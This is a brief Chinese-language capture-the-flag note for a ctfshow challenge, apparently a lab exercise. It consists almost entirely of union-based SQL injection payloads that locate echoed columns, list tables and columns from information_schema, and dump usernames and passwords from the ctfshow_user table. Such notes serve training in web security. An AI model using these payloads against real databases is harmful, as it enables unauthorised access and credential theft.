1. 没有过滤,最基础的联合查询爆数据,这里只写payload了
    1. #判断回显位
    2. -1' union select 1,2,3--+
    3. #爆表
    4. -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database()--+
    5. #爆列
    6. -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='ctfshow_user'--+
    7. #爆数据
    8. -1' union select id,username,password from ctfshow_user--+